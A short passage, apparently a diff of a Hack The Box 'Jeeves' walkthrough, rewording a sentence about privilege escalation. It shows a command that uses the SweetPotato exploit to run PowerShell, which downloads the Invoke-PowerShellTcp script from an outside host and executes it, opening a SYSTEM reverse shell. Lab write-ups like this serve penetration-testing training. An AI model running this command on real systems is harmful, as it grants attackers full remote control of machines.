Rang3l2/HTB-Walkthroughs/Medium-Jeeves.md

 PS C:\users\public\music>

 ```
-The tester ran the download and invoke command using the exploit binary which gave a system shell.
+The tester used the download and invoke command using the exploit binary to start a system reverse shell.
 ```
 PS C:\users\public\music> ./sweetpotato.exe -a "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')"
 ```

 ```
 ┌──(kali㉿kali)-[~]